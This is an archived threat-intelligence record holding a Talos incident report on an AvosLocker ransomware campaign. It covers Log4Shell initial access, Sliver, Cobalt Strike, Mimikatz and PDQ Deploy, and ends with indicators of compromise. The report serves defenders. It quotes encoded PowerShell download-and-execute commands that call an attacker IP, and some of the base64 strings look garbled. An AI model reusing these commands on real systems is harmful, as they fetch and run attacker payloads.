{ "id": "5cb79e53-ba7c-458b-b9ac-fe77ebbc93a9", "created_at": "2026-04-06T01:31:17.840004Z", "updated_at": "2026-04-10T13:12:24.713248Z", "deleted_at": null, "sha1_hash": "27dab08356e39f33624f2df77f9bd3ecf965a1c9", "title": "Avos ransomware group expands with new attack arsenal", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 238838, "plain_text": "Avos ransomware group expands with new attack arsenal\r\nBy Chris Neal\r\nPublished: 2022-06-21 ยท Archived: 2026-04-06 00:42:41 UTC\r\nTuesday, June 21, 2022 07:58\r\nBy Flavio Costa,\r\nIn a recent customer engagement, we observed a month-long AvosLocker campaign.\r\nThe attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network\r\nscanners.\r\nThe initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were\r\nvulnerable to Log4Shell. While Cisco products were deployed on the network, the appliances were never configured,\r\nallowing the attacker to gain access to internal servers and maintain a foothold.\r\nDuring the time the attacker was active in the network, several security events were detected by the security products\r\nbut were not reviewed by the security team, which could have prevented the ransomware activity.\r\nThreat Actor Profile: Avos\r\nAvos is a ransomware group first identified in 2021 initially targeting Windows machines. More recently, a new ransomware\r\nvariant of AvosLocker, named after the group, is also targeting Linux environments. Well-funded and financially motivated,\r\nAvos has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, an affiliate program to recruit\r\npotential partners. The announcement of the program includes information about the features of the ransomware and lets\r\naffiliates know that AvosLocker operators will handle negotiation and extortion practices. The user \"Avos\" has also been\r\nobserved trying to recruit individuals on the Russian forum XSS.\r\nInitial vector\r\nTypically, Avos uses spam email campaigns as an initial infection vector to deliver ransomware. In this particular incident,\r\nhowever, the initial vector was an ESXi server exposed on the internet over VMWare Horizon Unified Access Gateways\r\n(UAG), which was vulnerable to the Log4Shell vulnerability. The customer notified Talos on March 7 2022, but noticed\r\nactivity related to the ransomware attack as far back as Feb. 7, 2022.\r\nSeveral vulnerabilities associated with Log4j, listed below, were found on this customer's UAG:\r\nCVE-2021-44228\r\nCVE-2021-45046\r\nCVE-2021-45105\r\nCVE-2021-44832\r\nThese vulnerabilities can potentially allow remote code execution on Unified Access Gateways by a low-privilege non-root\r\nuser named \"gateway\". Beyond that, the inner-transit firewalls that could control or limit the access to the internal\r\ninfrastructure were not configured, hence, the attackers used it as the initial access to establish a foothold on the customer's\r\nnetwork, granting access to their internal servers.\r\nThe victim in this case used Cisco Secure Endpoint (formerly known as Advanced Malware Protection) as its EPP/EDR\r\nsolution on most endpoints, from workstations to servers, which allowed Talos to collect important information about the\r\nhttps://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html\r\nPage 1 of 4\n\nentire attack lifecycle.\r\nAttack Timeline\r\nDuring the initial phases of the attack the threat actor made numerous steps to gain a foothold on the victim network. Several\r\nother payloads and malicious tools were observed on endpoints, along with the utilization of living-off-the-land binaries\r\n(LoLBins).\r\nTalos observed the attackers using the WMI Provider Host (wmiprvse.exe) on a Windows Server that was the initial point of\r\nentry to run an encoded PowerShell script using the DownloadString method at 01:41 UTC on Feb. 11.\r\nThree days later, on Feb. 14, a retrospective detection was triggered for the RuntimeBrokerService.exe executable in\r\n\"C:\\Windows\\System32\\temp\\\" for creating a file called \"watcher.exe.\" These particular files may be artifacts from a\r\nseparate threat actor, as these files appear to be related to a cryptocurrency miner rather than AvosLocker. It is not\r\nuncommon for a miner to be deployed alongside ransomware in an attempt to passively increase revenue. However, there is\r\nsignificant evidence that multiple threat actors had compromised this network, as DarkComet samples unrelated to this\r\ncampaign were also discovered.\r\nApproximately four weeks later on March 4, another encoded PowerShell command was executed, shown below, again\r\nutilizing the DownloadString method.\r\npowershell.exe -exec bypass -enc\r\naQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKA\r\nDecoded:\r\niex (New-Object SystemNetWebClient)DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');\r\nTwo days later on March 6, the attacker ran more PowerShell scripts to download and execute a Sliver payload labeled\r\n\"vmware_kb.exe\". As seen in their blog post regarding Sliver, Team Cymru has observed the deployment of this executable\r\nin a similar campaign. In the following days, several PowerShell scripts downloaded additional files, including Mimikatz\r\nand a .zip archive called \"IIS Temporary Compressed Files.zip\" containing Cobalt Strike beacons and a port scanner labeled\r\n\"scanner.exe.\" This port scanner is a commercially available product which Avos is known for deploying called SoftPerfect\r\nNetwork Scanner. Later that same day, the attackers utilized WMIC to modify administrative settings on both a local and a\r\nremote host, behavior that is indicative of the first stages of lateral movement.\r\nAnother PowerShell command observed on March 6, shown below, is an artifact from a Cobalt Strike beacon executing its\r\npowershell-import function:\r\npowershell -nop -exec bypass -EncodedCommand\r\nSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAAAuAFcAZQBiAGMAbAbABpAGUAbgB0ACkALgBEAG8A\r\ndwBuAGwAbwAgAUQAUWB0AHIAAQBuAGcAKAAAGgAdAB0AAAOgAvAC8AMQAyADcALgAwAC4AMAAAAAAAAGAzADIANAA2AdcA\r\nDecoded:\r\nIEX (New-Object NetWebclient)DownloadString('http://127.0.0.1:32467/')\r\nOn March 8, another instance of the SoftPerfect Network Scanner was transferred via AnyDesk to another server in the\r\nnetwork. Later that day, the AvosLocker payload was finally delivered, using the victim's company name as the filename.\r\nTo proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate\r\nsoftware deployment tool. Once the ransomware was delivered, the victims files were then encrypted and a ransom note was\r\ndisplayed, shown below.\r\nConclusion\r\nThis incident showcases the importance of ensuring that security appliances are properly set up and configured, updates and\r\npatches are applied and the security team is always monitoring alerts. While the attack techniques used in this campaign are\r\nnot novel, they are still effective if the proper precautions are not in place.\r\nWith a highly motivated threat actor like Avos actively recruiting affiliates, these attacks are likely to proliferate in the\r\nfuture. Such attackers are constantly hunting for vulnerable networks and can infiltrate them with relative ease, sometimes\r\nhttps://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html\r\nPage 2 of 4\n\nby multiple threat actors, as seen in this particular case. A layered defense model is therefore imperative to detect, contain\r\nand protect against post-exploitation activity. While static and network-based detection is important, it should be\r\ncomplemented with properly configured system behavior analysis and endpoint protections.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in\r\nthis post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests\r\nsuspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. For specific OSqueries on this threat, click here and here.\r\nIoCs\r\nAvosLocker\r\nffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f\r\ncee38fd125aa3707DC77351dde129dba5e5aa978b9429ef3e09a95ebf127b46b\r\nSliver\r\n7f0deab21a3773295319e7a0afca1bea792943de0041e22523eb0d61a1c155e2\r\nMimikatZ\r\ncac73029ad6a543b423822923967f4c240d02516fab34185c59067896ac6eb99\r\n29a3ae1d32e249d01b39520cd1db27aa980e646d83694ff078424bed60df9304\r\n63bdd396ff6397b3a17913badb7905c88e217d0a8cf864ab5e71cc174a4f97a1\r\n63ebb998ebbbfe3863214a85c388fc23b58af4492b2e96eb53c436360344d79d\r\n912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9\r\nf2faa8a91840de16efb8194182bcfa9919b74a2c2de40d6ed4791a3308897a01\r\nCobalt Strike artifacts\r\nhttps://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html\r\nPage 3 of 4\n\nsmb.ps1\r\n48514e6bb92dd9e24a16a4ab1c7c3bd89dad76bef53cec2a671821024fadcb2b\r\n61239d726c92c82f553200ecbec3ac18d251902fb9ca4d4f52263c82374a5b75\r\nbeacon.ps1\r\ne4af7f048e93b159e20cc3efbacdb68e3c1fb213324daf325268ccb71f6c3189\r\ne68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f\r\nIIS Temporary Compressed Files.zip\r\n978dffa295ac822064ff6f7a6b6bc498e854f833d36633214d35ccce70db4819\r\nURLs\r\nhxxp[://]45[.]136[.]230[.]191:4000/D234R23\r\nIPs\r\n176[.]113[.]115[.]107\r\n45[.]136[.]230[.]191\r\nSource: https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html\r\nhttps://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html" ], "report_names": [ "avoslocker-new-arsenal.html" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775439077, "ts_updated_at": 1775826744, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/27dab08356e39f33624f2df77f9bd3ecf965a1c9.pdf", "text": "https://archive.orkl.eu/27dab08356e39f33624f2df77f9bd3ecf965a1c9.txt", "img": "https://archive.orkl.eu/27dab08356e39f33624f2df77f9bd3ecf965a1c9.jpg" } }